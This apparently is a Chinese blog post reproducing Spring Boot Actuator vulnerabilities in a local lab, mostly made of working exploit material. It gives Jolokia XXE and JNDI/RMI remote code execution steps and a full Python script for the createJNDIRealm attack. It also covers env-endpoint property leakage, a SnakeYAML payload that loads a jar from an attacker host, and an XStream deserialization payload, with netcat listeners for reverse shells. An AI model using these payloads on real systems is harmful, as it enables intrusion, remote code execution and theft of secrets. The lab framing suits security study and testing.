bootstrap漏洞_常见Spring Boot漏洞复现

最新推荐文章于 2024-04-26 09:33:44 发布
最新推荐文章于 2024-04-26 09:33:44 发布
阅读量1.6w 收藏 11
点赞数
文章标签: bootstrap漏洞
本文详细介绍了Spring Boot的几个常见漏洞复现过程,包括Jolokia的XXE和RCE漏洞,env端点敏感信息泄露,以及xstream反序列化漏洞。通过环境搭建、端点利用和漏洞攻击步骤,展示了如何利用这些漏洞获取系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

复现一下Sprint Boot的一些漏洞

  • 环境搭建

Dump环境

c447bf231cae06451e36d113fe8ec31e.png

Mvn构建项目

f39e5254e531e5a4f87434b69a8939e5.png

启动项目

ac2fd2e202cb7287d7c022d6bfd1313f.png

aa58181d8b83d404c6703593d9f860c7.png

  • 端点信息

路径 描述

/autoconfig 提供了一份自动配置报告,记录哪些自动配置条件通过了,哪些没通过

/beans 描述应用程序上下文里全部的Bean,以及它们的关系

/env 获取全部环境属性

/configprops 描述配置属性(包含默认值)如何注入Bean

/dump 获取线程活动的快照

/health 报告应用程序的健康指标,这些值由HealthIndicator的实现类提供

/info 获取应用程序的定制信息,这些信息由info打头的属性提供

/mappings 描述全部的URI路径,以及它们和控制器(包含Actuator端点)的映射关系

/metrics 报告各种应用程序度量信息,比如内存用量和HTTP请求计数

/shutdown 关闭应用程序,要求endpoints.shutdown.enabled设置为true

/trace 提供基本的HTTP请求跟踪信息(时间戳、HTTP头等)

  • Spring Boot 1.x版本端点在根URL下注册

2.x版本端点移动到/actuator/路径

59da13dfc2b7cd6460035502f0726eec.png

Jolokia漏洞利用

Jolokia漏洞利用(XXE)

  • jolokia/list

查看jolokia/list中存在的 Mbeans,是否存在logback 库提供的reloadByURL方法

45cd5252eceba744a5e8e3bf5af45ba0.png

  • 创建logback.xml和fileread.dtd文件

logback.xml

xml version="1.0" encoding="utf-8" ?>

%remote;%int;]>

&trick;

fileread.dtd

">

  • 将文件上传到公网VPS上并且开启http服务

cfdaead0c777b9e0b152033cac22f0b0.png

  • 远程访问logback.xml文件

127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/x.x.x.x!/logback.xml

  • 成功利用xxe读取到etc/passwd文件内容

d2ce07cd85c48d1b82ffbac570363df9.png

Jolokia漏洞利用(RCE)

  • 下载修改RMI服务代码

f0d4e7d8d1227f0367488675fc199649.png

  • 编译打包

mvn clean install

打包成功后创建target目录下生成RMIServer-0.1.0.jar文件

3da1fe5914906ac2f492f1252763be99.png

  • 修改logback.xml文件内容

env-entry-name="rmi://x.x.x.x:1097/jndi" as="appName" />

290f01b8486da0c2120b7fc00f941df8.png

  • 把RMIServer-0.1.0.jar文件上传到公网vps上并执行

java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar

b1a34a4c084e439dbc1f365ff6eb3fe5.png

  • nc监听

nc -lvp 6666

22b75af987961a86b4990421cb878482.png

  • 漏洞url上访问

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/xxx.xxx.xxx.xxx!/logback.xml

  • 反弹shell

9fe5c87d87fc38de34171d643ca343ec.png

Jolokia漏洞利用(RCE-createJNDIRealm方法)

查看/jolokia/list 中存在的是否存在org.apache.catalina.mbeans.MBeanFactory类提供的createJNDIRealm方法,可能存在JNDI注入,导致远程代码执行

  • python执行脚本

import requests as req

import sys

from pprint import pprint

url = sys.argv[1] + "/jolokia/"

pprint(url)

#创建JNDIRealm

create_JNDIrealm = {

"mbean": "Tomcat:type=MBeanFactory",

"type": "EXEC",

"operation": "createJNDIRealm",

"arguments": ["Tomcat:type=Engine"]

}

#写入contextFactory

set_contextFactory = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "WRITE",

"attribute": "contextFactory",

"value": "com.sun.jndi.rmi.registry.RegistryContextFactory"

}

#写入connectionURL为自己公网RMI service地址

set_connectionURL = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "WRITE",

"attribute": "connectionURL",

"value": "rmi://x.x.x.x:1097/jndi"

}

#停止Realm

stop_JNDIrealm = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "EXEC",

"operation": "stop",

"arguments": []

}

#运行Realm,触发JNDI 注入

start = {

"mbean": "Tomcat:realmPath=/realm0,type=Realm",

"type": "EXEC",

"operation": "start",

"arguments": []

}

expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]

for i in expoloit:

rep = req.post(url, json=i)

pprint(rep.json())

  • 运行RMI服务

java -Djava.rmi.server.hostname=x.x.x.x -jar RMIServer-0.1.0.jar

cb108e6859f686783a84ffa50ac8fb63.png

  • nc 监听

nc -lvp 6666

  • python发送请求

python exp.py http://127.0.0.1:8090

9006e8421e2076e3d69c1777cfe80ca5.png

  • 反弹shell

9fe5c87d87fc38de34171d643ca343ec.png

env端点利用

SpringBoot env 获取* 敏感信息

如果Spring Cloud Libraries在路径中,则'/env'端点会默认允许修改Spring环境属性。“@ConfigurationProperties”的所有bean都可以进行修改和重新绑定。

  • 例如要获取PID(这是假设,假设PID为**)

63531741d7607b4c50156aec54f6ff06.png

  • 修改enveureka.client.serviceUrl.defaultZone属性

42be5dffdb9eb9c2559cae3605d1fe12.png

a1fddac5df0208db0087efb458419907.png

  • nc监听

e5196ccb664f2f1190e4dc370e129bb5.png

  • refresh

ae9c87cb5e84f38125704cb7835bb805.png

  • base64解码获取属性

a0eb72251c5acc832902abc3b83fddd0.png

spring Cloud env yaml利用

当spring boot使用Spring Cloud 相关组件时,会存在spring.cloud.bootstrap.location属性,通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE

  • 利用范围

Spring Boot 2.x 无法利用成功 Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功,使用 Edgware 无法成功 Spring Boot <= 1.4 可利用成功

  • 下载exp修改执行命令

https://github.com/artsploit/yaml-payload

76b87ad73e646d9c4c67f9eed622db63.png

  • 将java文件进行编译

javac src/artsploit/AwesomeScriptEngineFactory.java

jar -cvf yaml-payload.jar -C src/ .

87fcb38f433a609817767869fe880667.png

  • 创建yaml文件并放到公网

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[

!!java.net.URL ["http://xxx.xxx.xxx.xxx:8000/yaml-payload.jar"] ]]

]

  • 修改 spring.cloud.bootstrap.location为外部 yml 配置文件地址

e3027aef9dd482f740f8335d0afc4935.png

  • 请求 /refresh 接口触发

d7b7320512a9f8d28efbef4789c848e7.png

  • 执行命令成功

2158fb8ea015678690948cb6e335101e.png

xstream反序列化

  • 前提条件

Eureka-Client <1.8.7(多见于Spring Cloud Netflix)

  • 在VPS创建xstream文件,使用flask返回application/xml格式数据

from flask import Flask, Response

app = Flask(__name__)

@app.route('/', defaults={'path': ''})

@app.route('/', methods = ['GET', 'POST'])

def catch_all(path):

xml = """

com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

javax.crypto.CipherInputStream">

javax.crypto.NullCipher">

javax.imageio.spi.FilterIterator">

javax.imageio.spi.FilterIterator">

java.util.Collections$EmptyIterator"/>

java.lang.ProcessBuilder">

命令

false

javax.imageio.ImageIO$ContainsFilter">

java.lang.ProcessBuilder

start

foo

foo

java.lang.ProcessBuilder$NullInputStream"/>

"""

return Response(xml, mimetype='application/xml')

  • 启动服务

python3 flask_xstream.py

d46c55f437bf1adc80dd9f2f115199d3.png

  • 写入配置

96661431fa9bfad9913e4c88f87f397e.png

  • 刷新触发

b86034edfc6453671179bf11e2a2a265.png

  • 获取反弹shell

86b7f397a63c569c9e2d38f5a1248442.png

参考

一次曲折的渗透测试之旅

Spring Boot Actuator 漏洞利用

Spring Boot Actuators配置不当导致RCE漏洞复现

SpringBoot开发——SpringBoot项目中存在的15 个常见的安全漏洞及解决方案
bjzhang75的博客
04-21 321
SpringBoot开发——SpringBoot项目中存在的15 个常见的安全漏洞及解决方案
若依管理框架-漏洞复现
千寻的博客
11-10 2102
RuoYi 是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。
bootstrap3.3.7源码和bootstr3.3.5中文离线手册
12-13
bootstrap3.3.7源码和bootstr3.3.5中文离线手册。Bootstrap 是最受欢迎的 HTML、CSS 和 JS 框架,用于开发响应式布局、移动设备优先的 WEB 项目。Bootstrap 让前端开发更快速、简单。所有开发者都能快速上手、所有设备都可以适配、所有项目都适用。
bootstrap漏洞_Weblogic反序列化漏洞(CVE201710271)复现
weixin_39990138的博客
11-28 3432
实验环境 攻击机:Windows 10 企业版 LTSC靶机:CentOS Linux release 8.1.1911 (Core)项目地址:https://github.com/vulhub/vulhub 基础环境搭建 安装dockercurl https://download.docker.com/linux/centos/docker-ce.repo -o ...
域渗透综合项目实战
干铮的博客
02-27 6488
1.项目网络拓扑 2.信息收集 netdiscover主机发现 sudo netdiscover -i eth0 -r 192.168.3.0/24 Nmap端口扫描 nmap -A 192.168.3.45 -p- -oN nmap.a
bootstrap漏洞_漏洞复现环境集锦Vulhub
weixin_39671509的博客
11-28 3655
0x01 Vulhub简介 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。0x02 安装# 安装pipcurl -shttps://bootstrap.pypa.io/get-pip.py| python3# 安装最新版dockercurl -shttps://get.docker.com/| sh# ...
bootstrap框架漏洞_学生会私房菜【202008011期】Apache Shiro 1.2.4反序列化漏洞
weixin_39653733的博客
11-27 1581
学生会私房菜学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。本期文档内容为:《Apache Shiro 1.2.4反序列化漏洞》作者介绍:Chow一名来自网络工程专业的安全爱好者,目前在国科学习安全课程,同时也在国科安全团体进行安全的实战练习,本次分享的内容是CVE-2016-4437的漏洞,希望可以帮助大家更好理解这个漏洞。0x00简介Apa...
bootstrap通用漏洞_Nexus Repository UserComponent远程代码执行漏洞浅析
weixin_39640687的博客
01-04 3216
更多全球网络安全资讯尽在邑安全简介Nexus Repository OSS是一款通用的软件包仓库管理(Universal Repository Manager)服务。Sonatype Nexus Repository Manager 3中的涉及漏洞的接口为/service/extdirect,接口需要管理员账户权限进行访问。该接口中处理请求时的UserComponent对象的注解的校验中...
bootstrap漏洞_ActiveMQ任意文件写入漏洞(CVE20163088)复现
weixin_39992312的博客
11-27 1757
漏洞详情漏洞说明#Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fi...
bootstrap框架漏洞_SpringMVC框架之第一篇
weixin_39921023的博客
11-21 1515
2
Spring Boot Actuator 漏洞复现合集
m0_54850467的博客
08-02 2044
SpringBootActuator端点通过JMX和HTTP公开暴露给外界访问,大多数时候我们使用基于HTTP的Actuator端点,因为它们很容易通过浏览器、CURL命令、shell脚本等方式访问。SpringBootActuator未授权访问/dump-显示线程转储(包括堆栈跟踪)/autoconfig-显示自动配置报告/configprops-显示配置属性/trace-显示最后几条HTTP消息(可能包含会话标识符)/logfile-输出日志文件的内容/...
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
最新发布
zz12345600354的博客
04-26 922
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
Bootstrap v3.3.7 bulid0316
10-02
Bootstrap是Twitter推出的一个用于前端开发的开源工具包。它由Twitter的设计师Mark Otto和Jacob Thornton合作开发,是一个CSS/HTML框架。Bootstrap 是最受欢迎的 HTML、CSS 和 JS 框架,用于开发响应式布
bootstrap-3.3.7-dist_boostrap源码_
09-30
boostrap-3.3.7源码,请大家参考,谢谢
spring cloud SnakeYAML RCE
12-08 1011
spring cloud SnakeYAML RCE
linux bootstrap强制结束,Cisco UCCX bootstrap服务目录遍历漏洞
weixin_39856589的博客
05-15 450
发布日期:2010-06-10更新日期:2010-06-12受影响系统:Cisco CRS 7.xCisco CRS 6.xCisco CRS 5.xCisco Unified IP IVR 7.xCisco Unified IP IVR 6.xCisco Unified IP IVR 5.xCisco Unified Contact Center Express 7.xCisco Unified...
django上传文件名相同_Web 安全漏洞之文件上传
weixin_39637203的博客
11-21 477
文件上传漏洞及危害文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器上,当开发者没有对该文件进行合理的校验及处理的时候,很有可能让程序执行这个上传文件导致安全漏洞。大部分网站都会有文件上传的功能,例如头像、图片、视频等,这块的逻辑如果处理不当,很容易触发服务器漏洞。这种漏洞在以文件名为 URL 特征的程序中比较多见。嗯,是的说的就是世界上最好的语言 PHP。例如用户上传了一个 PHP 文件,...
python使用符号 标示注释-第一章:Python语言程序设计
weixin_37988176的博客
11-01 606
关于课程:课程作者为北京理工大学教授嵩天学习账号是微信账号登陆:昵称为coke1-1节:程序设计的基本方法计算机与程序设计编译和解释程序的基本编写方法计算机编程1-1单元小结计算机与程序设计计算机的概念:计算机是根据指令操作数据的设备,具有功能性和可编程性。功能性:是指对计算机的操作,表现为数据的计算,输入输出的处理和结果存储等。可编程性:根据一系列指令自动地、可预测性、准确的完成操作者的意图。计...
bootstrap遇到的坑 -col
xx13202405349的博客
03-02 1962
加载了bootstrap.min.js文件,然后自己也反复查看了代码没有问题,但是栅格系统却没有办法用,后来找了资料才知道是版本问题,v2版本与v3版本就差在了响应式的col的代码上。更加代码后就可以使用col-了。
Bootstrap Table与Spring Boot集成实现动态分页
### Spring BootBootstrap实现分页加载的详细知识点 #### 1. Spring Boot简介 Spring Boot是由Pivotal团队提供的全新框架,其设计目的是简化新Spring应用的初始搭建以及开发过程。它使用了特定的方式来进行配置,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值